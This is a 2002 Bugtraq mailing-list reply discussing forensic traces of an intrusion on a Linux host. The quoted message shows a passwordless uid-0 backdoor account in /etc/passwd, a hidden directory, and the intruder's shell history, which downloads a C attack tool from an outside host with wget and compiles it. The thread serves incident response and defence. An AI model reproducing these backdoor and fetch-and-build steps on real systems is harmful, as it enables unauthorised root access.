Re: watching them -after the fact

From: zeno (bugtraq@cgisecurity.net)
Date: 03/26/02


From: zeno <bugtraq@cgisecurity.net>
To: alvin.sec@Mail.Linux-Consulting.com (Alvin Oga)
Date: Tue, 26 Mar 2002 09:23:01 -0500 (EST)


> so they couldn't do much ???

tftp, cc, perl, python, other compliers are all threats.
tftp can allow downloading of gcc or other compiliers. scp (secure copy) can
also allow this. Never assume something can't be done. If the OS is linux
for example they could open an editor and paste compiled code from another
system and perhaps get that working.

- zeno@cgisecurity.com

>
> they also created an empty dir: "/dev/ /"
> ( yes... a space as its filename )
>
> c ya
> alvin
>
>
> cat /etc/passwd
> ...
>
> -->> karlin::1001:1001::/tmp:/bin/bash
> -->> r00t::0:0::/tmp:/bin/bash
>
>
> cat /tmp/.bash_history
> ...
> su r00t
> su r00t
> sudo
> suidperl
> uname -a
> w
> uname -a
> exit
> su r00t
> uname -a
> w
> exit
> w
> su r00t
> exit
> w
> su r00t
> exit
> wget turma85.hypermart.net/slice.c
> gcc -o sl slice.c
> exit
> su r00t
> w
> exit
> #
> # end of history
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com